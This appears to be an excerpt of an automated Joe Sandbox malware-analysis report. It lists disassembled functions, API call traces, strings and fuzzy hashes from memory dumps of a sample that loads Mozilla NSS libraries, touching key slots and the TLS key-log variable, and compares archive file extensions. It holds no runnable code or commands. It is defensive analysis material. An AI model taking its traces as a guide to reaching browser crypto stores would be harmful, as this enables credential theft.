                                                                                                                                                                                                                • Part of subcall function 6CB06C30: strncmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,sql:,00000004,?,?,?,?,?,?,?,00000000,00000000,6CB0781D,?,6CAFBE2C,?), ref: 6CB06C58
                                                                                                                                                                                                                • Part of subcall function 6CB06C30: strncmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,rdb:,00000004,?,?,?,?,?,?,?,?,?,?,00000000,00000000,6CB0781D), ref: 6CB06C6F
                                                                                                                                                                                                                • Part of subcall function 6CB06C30: strncmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,extern:,00000007), ref: 6CB06C84
                                                                                                                                                                                                                • Part of subcall function 6CB06C30: PR_GetEnvSecure.NSS3(NSS_DEFAULT_DB_TYPE), ref: 6CB06C96
                                                                                                                                                                                                                • Part of subcall function 6CB06C30: strcmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,dbm), ref: 6CB06CAA
                                                                                                                                                                                                              • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,?), ref: 6CB06F90
                                                                                                                                                                                                              • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,?), ref: 6CB06FC5
                                                                                                                                                                                                              • PK11_GetInternalKeySlot.NSS3 ref: 6CB06FF4
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.3416877073.000000006CA41000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CA40000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.3416838227.000000006CA40000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417188068.000000006CBDF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417240038.000000006CC1E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417263683.000000006CC1F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417298980.000000006CC20000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417326070.000000006CC25000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_6ca40000_7ZthFNAqYp.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: free$strcmp$strncmp$FlagL_strncasecmp$Strip$InternalK11_ParameterSecureSkipSlot
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 1304971872-0
                                                                                                                                                                                                              • Opcode ID: 8f2f7d1cf49856750d0e36f5a331105f2c2e46fe07917881d837e346110a5b27
                                                                                                                                                                                                              • Instruction ID: 4b34a3e5c8d079e90f7d03cf03869a4b5e816e4240fadb6c8955fd4c4a0cad9a
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 8f2f7d1cf49856750d0e36f5a331105f2c2e46fe07917881d837e346110a5b27
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 17B149B0F012999FDF01DBA5D845B9EBFB8EF09248F140124EC15E7A41E731E994CBA2
                                                                                                                                                                                                              Function 6CB04C20 Relevance: 30.3, APIs: 20, Instructions: 290memoryCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • TlsGetValue.KERNEL32 ref: 6CB04C4C
                                                                                                                                                                                                              • EnterCriticalSection.KERNEL32(?), ref: 6CB04C60
                                                                                                                                                                                                              • PR_Unlock.NSS3(?,?,?,?,?,?,?,?,?,?,?), ref: 6CB04CA1
                                                                                                                                                                                                              • TlsGetValue.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 6CB04CBE
                                                                                                                                                                                                              • EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 6CB04CD2
                                                                                                                                                                                                              • realloc.MOZGLUE(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6CB04D3A
                                                                                                                                                                                                              • PORT_Alloc_Util.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6CB04D4F
                                                                                                                                                                                                              • PR_Unlock.NSS3(?,?,?,?,?,?,?,?,?,?,?), ref: 6CB04DB7
                                                                                                                                                                                                                • Part of subcall function 6CB6DD70: TlsGetValue.KERNEL32 ref: 6CB6DD8C
                                                                                                                                                                                                                • Part of subcall function 6CB6DD70: LeaveCriticalSection.KERNEL32(00000000), ref: 6CB6DDB4
                                                                                                                                                                                                                • Part of subcall function 6CAB07A0: TlsGetValue.KERNEL32(00000000,?,?,?,?,6CA4204A), ref: 6CAB07AD
                                                                                                                                                                                                                • Part of subcall function 6CAB07A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6CA4204A), ref: 6CAB07CD
                                                                                                                                                                                                                • Part of subcall function 6CAB07A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6CA4204A), ref: 6CAB07D6
                                                                                                                                                                                                                • Part of subcall function 6CAB07A0: calloc.MOZGLUE(00000001,00000144,?,?,?,?,6CA4204A), ref: 6CAB07E4
                                                                                                                                                                                                                • Part of subcall function 6CAB07A0: TlsSetValue.KERNEL32(00000000,?,6CA4204A), ref: 6CAB0864
                                                                                                                                                                                                                • Part of subcall function 6CAB07A0: calloc.MOZGLUE(00000001,0000002C), ref: 6CAB0880
                                                                                                                                                                                                                • Part of subcall function 6CAB07A0: TlsSetValue.KERNEL32(00000000,?,?,6CA4204A), ref: 6CAB08CB
                                                                                                                                                                                                                • Part of subcall function 6CAB07A0: TlsGetValue.KERNEL32(?,?,6CA4204A), ref: 6CAB08D7
                                                                                                                                                                                                                • Part of subcall function 6CAB07A0: TlsGetValue.KERNEL32(?,?,6CA4204A), ref: 6CAB08FB
                                                                                                                                                                                                              • TlsGetValue.KERNEL32 ref: 6CB04DD7
                                                                                                                                                                                                              • EnterCriticalSection.KERNEL32(?), ref: 6CB04DEC
                                                                                                                                                                                                              • PR_Unlock.NSS3(?), ref: 6CB04E1B
                                                                                                                                                                                                              • PR_SetError.NSS3(00000000,00000000), ref: 6CB04E2F
                                                                                                                                                                                                              • PR_SetError.NSS3(FFFFE013,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6CB04E5A
                                                                                                                                                                                                              • PR_SetError.NSS3(00000000,00000000), ref: 6CB04E71
                                                                                                                                                                                                              • free.MOZGLUE(00000000), ref: 6CB04E7A
                                                                                                                                                                                                              • PR_Unlock.NSS3(?), ref: 6CB04EA2
                                                                                                                                                                                                              • TlsGetValue.KERNEL32 ref: 6CB04EC1
                                                                                                                                                                                                              • EnterCriticalSection.KERNEL32(?), ref: 6CB04ED6
                                                                                                                                                                                                              • PR_Unlock.NSS3(?), ref: 6CB04F01
                                                                                                                                                                                                              • free.MOZGLUE(00000000), ref: 6CB04F2A
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.3416877073.000000006CA41000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CA40000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.3416838227.000000006CA40000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417188068.000000006CBDF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417240038.000000006CC1E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417263683.000000006CC1F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417298980.000000006CC20000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417326070.000000006CC25000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_6ca40000_7ZthFNAqYp.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Value$CriticalSectionUnlock$Enter$Error$callocfree$Alloc_LeaveUtilrealloc
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 759471828-0
                                                                                                                                                                                                              • Opcode ID: 4d977bfd039faf33935cbfc2411bea3a3fee2ae5e3b89cba7ddcbfcf15ea3ccc
                                                                                                                                                                                                              • Instruction ID: 9e9c1c72e6cb1f4a7c9f4b3da35e8b12f3307347de534b57be55caff44ec4d0a
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 4d977bfd039faf33935cbfc2411bea3a3fee2ae5e3b89cba7ddcbfcf15ea3ccc
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 7EB100B5B002459FDB00EF69D844AAA7BB4FF19318F144128EC1997B00EB34E9A5CFD2
                                                                                                                                                                                                              Function 6CB56E90 Relevance: 30.1, APIs: 11, Strings: 6, Instructions: 305fileCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • PR_GetEnvSecure.NSS3(SSLKEYLOGFILE,?,6CB56BF7), ref: 6CB56EB6
                                                                                                                                                                                                                • Part of subcall function 6CAB1240: TlsGetValue.KERNEL32(00000040,?,6CAB116C,NSPR_LOG_MODULES), ref: 6CAB1267
                                                                                                                                                                                                                • Part of subcall function 6CAB1240: EnterCriticalSection.KERNEL32(?,?,?,6CAB116C,NSPR_LOG_MODULES), ref: 6CAB127C
                                                                                                                                                                                                                • Part of subcall function 6CAB1240: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(?,?,?,?,6CAB116C,NSPR_LOG_MODULES), ref: 6CAB1291
                                                                                                                                                                                                                • Part of subcall function 6CAB1240: PR_Unlock.NSS3(?,?,?,?,6CAB116C,NSPR_LOG_MODULES), ref: 6CAB12A0
                                                                                                                                                                                                              • fopen.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,6CBFFC0A,6CB56BF7), ref: 6CB56ECD
                                                                                                                                                                                                              • ftell.API-MS-WIN-CRT-STDIO-L1-1-0(00000000), ref: 6CB56EE0
                                                                                                                                                                                                              • fwrite.API-MS-WIN-CRT-STDIO-L1-1-0(# SSL/TLS secrets log file, generated by NSS,0000002D,00000001), ref: 6CB56EFC
                                                                                                                                                                                                              • PR_NewLock.NSS3 ref: 6CB56F04
                                                                                                                                                                                                              • fclose.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 6CB56F18
                                                                                                                                                                                                              • PR_GetEnvSecure.NSS3(SSLFORCELOCKS,6CB56BF7), ref: 6CB56F30
                                                                                                                                                                                                              • PR_GetEnvSecure.NSS3(NSS_SSL_ENABLE_RENEGOTIATION,?,6CB56BF7), ref: 6CB56F54
                                                                                                                                                                                                              • PR_GetEnvSecure.NSS3(NSS_SSL_REQUIRE_SAFE_NEGOTIATION,?,?,6CB56BF7), ref: 6CB56FE0
                                                                                                                                                                                                              • PR_GetEnvSecure.NSS3(NSS_SSL_CBC_RANDOM_IV,?,?,?,6CB56BF7), ref: 6CB56FFD
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              • NSS_SSL_CBC_RANDOM_IV, xrefs: 6CB56FF8
                                                                                                                                                                                                              • SSLFORCELOCKS, xrefs: 6CB56F2B
                                                                                                                                                                                                              • NSS_SSL_ENABLE_RENEGOTIATION, xrefs: 6CB56F4F
                                                                                                                                                                                                              • NSS_SSL_REQUIRE_SAFE_NEGOTIATION, xrefs: 6CB56FDB
                                                                                                                                                                                                              • SSLKEYLOGFILE, xrefs: 6CB56EB1
                                                                                                                                                                                                              • # SSL/TLS secrets log file, generated by NSS, xrefs: 6CB56EF7
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.3416877073.000000006CA41000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CA40000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.3416838227.000000006CA40000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417188068.000000006CBDF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417240038.000000006CC1E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417263683.000000006CC1F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417298980.000000006CC20000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417326070.000000006CC25000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_6ca40000_7ZthFNAqYp.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Secure$CriticalEnterLockSectionUnlockValuefclosefopenftellfwritegetenv
                                                                                                                                                                                                              • String ID: # SSL/TLS secrets log file, generated by NSS$NSS_SSL_CBC_RANDOM_IV$NSS_SSL_ENABLE_RENEGOTIATION$NSS_SSL_REQUIRE_SAFE_NEGOTIATION$SSLFORCELOCKS$SSLKEYLOGFILE
                                                                                                                                                                                                              • API String ID: 412497378-2352201381
                                                                                                                                                                                                              • Opcode ID: 080f87ce65e2cec2071650d0743b791909631b354342e3e4fe16abe11cfca3ef
                                                                                                                                                                                                              • Instruction ID: f18b145dcb01d650c93b27cff5f5fd1c5e69635c03b114579fda34fb062f0e91
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 080f87ce65e2cec2071650d0743b791909631b354342e3e4fe16abe11cfca3ef
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 0CA10A72B769C04BEB104E3CCC1135932B5A743339F9883A5E831D7FD5DBBAA4658242
                                                                                                                                                                                                              Function 6CAD5DB0 Relevance: 30.0, APIs: 16, Strings: 1, Instructions: 238memoryCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • NSS_GetAlgorithmPolicy.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6CAD5DEC
                                                                                                                                                                                                              • PR_SetError.NSS3(FFFFE0B5,00000000,?,?,?,?,?,?,?,?), ref: 6CAD5E0F
                                                                                                                                                                                                              • PORT_ZAlloc_Util.NSS3(00000828), ref: 6CAD5E35
                                                                                                                                                                                                              • SECKEY_CopyPublicKey.NSS3(?), ref: 6CAD5E6A
                                                                                                                                                                                                              • HASH_GetHashTypeByOidTag.NSS3(00000000), ref: 6CAD5EC3
                                                                                                                                                                                                              • NSS_GetAlgorithmPolicy.NSS3(00000000,00000020), ref: 6CAD5ED9
                                                                                                                                                                                                              • SECKEY_SignatureLen.NSS3(?), ref: 6CAD5F09
                                                                                                                                                                                                              • PR_SetError.NSS3(FFFFE0B5,00000000), ref: 6CAD5F49
                                                                                                                                                                                                              • SECKEY_DestroyPublicKey.NSS3(?), ref: 6CAD5F89
                                                                                                                                                                                                              • free.MOZGLUE(?), ref: 6CAD5FA0
                                                                                                                                                                                                              • SECITEM_ZfreeItem_Util.NSS3(?,00000001), ref: 6CAD5FB6
                                                                                                                                                                                                              • free.MOZGLUE(00000000), ref: 6CAD5FBF
                                                                                                                                                                                                              • memcpy.VCRUNTIME140(?,?,00000000), ref: 6CAD600C
                                                                                                                                                                                                              • memcpy.VCRUNTIME140(?,?,00000000), ref: 6CAD6079
                                                                                                                                                                                                              • SECITEM_ZfreeItem_Util.NSS3(00000000,00000001), ref: 6CAD6084
                                                                                                                                                                                                              • SECITEM_ZfreeItem_Util.NSS3(00000000,00000001), ref: 6CAD6094
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.3416877073.000000006CA41000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CA40000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.3416838227.000000006CA40000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417188068.000000006CBDF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417240038.000000006CC1E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417263683.000000006CC1F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417298980.000000006CC20000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417326070.000000006CC25000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_6ca40000_7ZthFNAqYp.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Util$Item_Zfree$AlgorithmErrorPolicyPublicfreememcpy$Alloc_CopyDestroyHashSignatureType
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 2310191401-3916222277
                                                                                                                                                                                                              • Opcode ID: 58ff9d2548e8addad05ea8db24a5eb293a0bcbb63496ae8a343cf9c4c78a02d1
                                                                                                                                                                                                              • Instruction ID: 60cf08f3b1a1034bac9a1568e6861185b136dd9e466278cec6ccaf12f17e27c9
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 58ff9d2548e8addad05ea8db24a5eb293a0bcbb63496ae8a343cf9c4c78a02d1
                                                                                                                                                                                                              • Instruction Fuzzy Hash: CB81D7B1E002059BDB108E64CC81BAE77B5EF48318F1A4528E859EBB51E735F994CB92
                                                                                                                                                                                                              Function 0093BA01 Relevance: 28.1, APIs: 9, Strings: 7, Instructions: 65stringCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • lstrlenA.KERNEL32(00000000,762283C0,00000000,0093C6EC,?), ref: 0093BA06
                                                                                                                                                                                                              • StrCmpCA.SHLWAPI(762283C0,0095613C), ref: 0093BA34
                                                                                                                                                                                                              • StrCmpCA.SHLWAPI(762283C0,.zip), ref: 0093BA44
                                                                                                                                                                                                              • StrCmpCA.SHLWAPI(762283C0,.zoo), ref: 0093BA50
                                                                                                                                                                                                              • StrCmpCA.SHLWAPI(762283C0,.arc), ref: 0093BA5C
                                                                                                                                                                                                              • StrCmpCA.SHLWAPI(762283C0,.lzh), ref: 0093BA68
                                                                                                                                                                                                              • StrCmpCA.SHLWAPI(762283C0,.arj), ref: 0093BA74
                                                                                                                                                                                                              • StrCmpCA.SHLWAPI(762283C0,.gz), ref: 0093BA80
                                                                                                                                                                                                              • StrCmpCA.SHLWAPI(762283C0,.tgz), ref: 0093BA8C
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.3393003879.0000000000920000.00000040.00000400.00020000.00000000.sdmp, Offset: 00920000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.000000000099D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000AB5000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000AB8000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000ABE000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000ADD000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000AFC000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000B7D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000B90000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_920000_7ZthFNAqYp.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: lstrlen
                                                                                                                                                                                                              • String ID: .arc$.arj$.gz$.lzh$.tgz$.zip$.zoo
                                                                                                                                                                                                              • API String ID: 1659193697-51310709
                                                                                                                                                                                                              • Opcode ID: efa6d69d90ae2c0cda2d1a467ead59e85eca4af576766357e318db7c516502cc
                                                                                                                                                                                                              • Instruction ID: 45ae3d992304a9b3aec0da4309ab4e4ceddd63346d063fad8283e5cc39b0c9fd
                                                                                                                                                                                                              • Opcode Fuzzy Hash: efa6d69d90ae2c0cda2d1a467ead59e85eca4af576766357e318db7c516502cc
                                                                                                                                                                                                              • Instruction Fuzzy Hash: B9017120BC4B77655AA292328D41E3E1EDC5DE2F8BF440415FE06E2088FB489907EFB1
                                                                                                                                                                                                              Function 6CBD9C60 Relevance: 27.2, APIs: 18, Instructions: 202threadCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • calloc.MOZGLUE(00000001,00000080), ref: 6CBD9C70
                                                                                                                                                                                                              • PR_NewLock.NSS3 ref: 6CBD9C85
                                                                                                                                                                                                                • Part of subcall function 6CB898D0: calloc.MOZGLUE(00000001,00000084,6CAB0936,00000001,?,6CAB102C), ref: 6CB898E5
                                                                                                                                                                                                              • PR_NewCondVar.NSS3(00000000), ref: 6CBD9C96
                                                                                                                                                                                                                • Part of subcall function 6CAABB80: calloc.MOZGLUE(00000001,00000084,00000000,00000040,?,6CAB21BC), ref: 6CAABB8C
                                                                                                                                                                                                              • PR_NewLock.NSS3 ref: 6CBD9CA9
                                                                                                                                                                                                                • Part of subcall function 6CB898D0: InitializeCriticalSectionAndSpinCount.KERNEL32(0000001C,000005DC), ref: 6CB89946
                                                                                                                                                                                                                • Part of subcall function 6CB898D0: GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,6CA416B7,00000000), ref: 6CB8994E
                                                                                                                                                                                                                • Part of subcall function 6CB898D0: free.MOZGLUE(00000000), ref: 6CB8995E
                                                                                                                                                                                                              • PR_NewLock.NSS3 ref: 6CBD9CB9
                                                                                                                                                                                                              • PR_NewLock.NSS3 ref: 6CBD9CC9
                                                                                                                                                                                                              • PR_NewCondVar.NSS3(00000000), ref: 6CBD9CDA
                                                                                                                                                                                                                • Part of subcall function 6CAABB80: PR_SetError.NSS3(FFFFE890,00000000), ref: 6CAABBEB
                                                                                                                                                                                                                • Part of subcall function 6CAABB80: InitializeCriticalSectionAndSpinCount.KERNEL32(0000000C,000005DC), ref: 6CAABBFB
                                                                                                                                                                                                                • Part of subcall function 6CAABB80: GetLastError.KERNEL32 ref: 6CAABC03
                                                                                                                                                                                                                • Part of subcall function 6CAABB80: PR_SetError.NSS3(FFFFE8AA,00000000), ref: 6CAABC19
                                                                                                                                                                                                                • Part of subcall function 6CAABB80: free.MOZGLUE(00000000), ref: 6CAABC22
                                                                                                                                                                                                              • PR_NewCondVar.NSS3(?), ref: 6CBD9CF0
                                                                                                                                                                                                              • PR_NewPollableEvent.NSS3 ref: 6CBD9D03
                                                                                                                                                                                                                • Part of subcall function 6CBCF3B0: PR_CallOnce.NSS3(6CC214B0,6CBCF510), ref: 6CBCF3E6
                                                                                                                                                                                                                • Part of subcall function 6CBCF3B0: PR_CreateIOLayerStub.NSS3(6CC2006C), ref: 6CBCF402
                                                                                                                                                                                                                • Part of subcall function 6CBCF3B0: PR_Malloc.NSS3(00000004), ref: 6CBCF416
                                                                                                                                                                                                                • Part of subcall function 6CBCF3B0: PR_NewTCPSocketPair.NSS3(?), ref: 6CBCF42D
                                                                                                                                                                                                                • Part of subcall function 6CBCF3B0: PR_SetSocketOption.NSS3(?), ref: 6CBCF455
                                                                                                                                                                                                                • Part of subcall function 6CBCF3B0: PR_PushIOLayer.NSS3(?,000000FE,00000000), ref: 6CBCF473
                                                                                                                                                                                                                • Part of subcall function 6CB89890: TlsGetValue.KERNEL32(?,?,?,6CB897EB), ref: 6CB8989E
                                                                                                                                                                                                              • EnterCriticalSection.KERNEL32(?), ref: 6CBD9D78
                                                                                                                                                                                                              • calloc.MOZGLUE(00000001,0000000C), ref: 6CBD9DAF
                                                                                                                                                                                                              • _PR_CreateThread.NSS3(00000000,6CBD9EA0,00000000,00000001,00000001,00000000,?,00000000), ref: 6CBD9D9F
                                                                                                                                                                                                                • Part of subcall function 6CAAB3C0: TlsGetValue.KERNEL32 ref: 6CAAB403
                                                                                                                                                                                                                • Part of subcall function 6CAAB3C0: _PR_NativeCreateThread.NSS3(?,?,?,?,?,?,?,?), ref: 6CAAB459
                                                                                                                                                                                                              • _PR_CreateThread.NSS3(00000000,6CBDA060,00000000,00000001,00000001,00000000,?,00000000), ref: 6CBD9DE8
                                                                                                                                                                                                              • calloc.MOZGLUE(00000001,0000000C), ref: 6CBD9DFC
                                                                                                                                                                                                              • _PR_CreateThread.NSS3(00000000,6CBDA530,00000000,00000001,00000001,00000000,?,00000000), ref: 6CBD9E29
                                                                                                                                                                                                              • calloc.MOZGLUE(00000001,0000000C), ref: 6CBD9E3D
                                                                                                                                                                                                              • _PR_MD_UNLOCK.NSS3(?), ref: 6CBD9E71
                                                                                                                                                                                                              • PR_SetError.NSS3(FFFFE890,00000000), ref: 6CBD9E89
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.3416877073.000000006CA41000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CA40000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.3416838227.000000006CA40000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417188068.000000006CBDF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417240038.000000006CC1E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417263683.000000006CC1F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417298980.000000006CC20000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417326070.000000006CC25000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_6ca40000_7ZthFNAqYp.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: calloc$CreateError$LockThread$CondCriticalSection$CountInitializeLastLayerSocketSpinValuefree$CallEnterEventMallocNativeOnceOptionPairPollablePushStub
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 4254102231-0
                                                                                                                                                                                                              • Opcode ID: a76927c0e7397a9aff27b8da901b5ab71d1f5ebf2ffa0fa30e48ea90d5c13b66
                                                                                                                                                                                                              • Instruction ID: 173e0894f1def235b2349045451165a19e28e7c43a2b533100b70ae2c1642ed9
                                                                                                                                                                                                              • Opcode Fuzzy Hash: a76927c0e7397a9aff27b8da901b5ab71d1f5ebf2ffa0fa30e48ea90d5c13b66
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 3A613CB1E00746AFD711DF75D854A6BBBF8FF09248B054529E81AC7B11EB30E858CBA1
                                                                                                                                                                                                              Function 00933A02 Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 127stringCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.3393003879.0000000000920000.00000040.00000400.00020000.00000000.sdmp, Offset: 00920000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.000000000099D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000AB5000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000AB8000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000ABE000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000ADD000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000AFC000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000B7D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000B90000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_920000_7ZthFNAqYp.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: ExitProcessstrtok_s
                                                                                                                                                                                                              • String ID: block
                                                                                                                                                                                                              • API String ID: 3407564107-2199623458
                                                                                                                                                                                                              • Opcode ID: b4ec73c8d084af738bca040cfe8478d754fad1efec9d07c3aafc1731d485a146
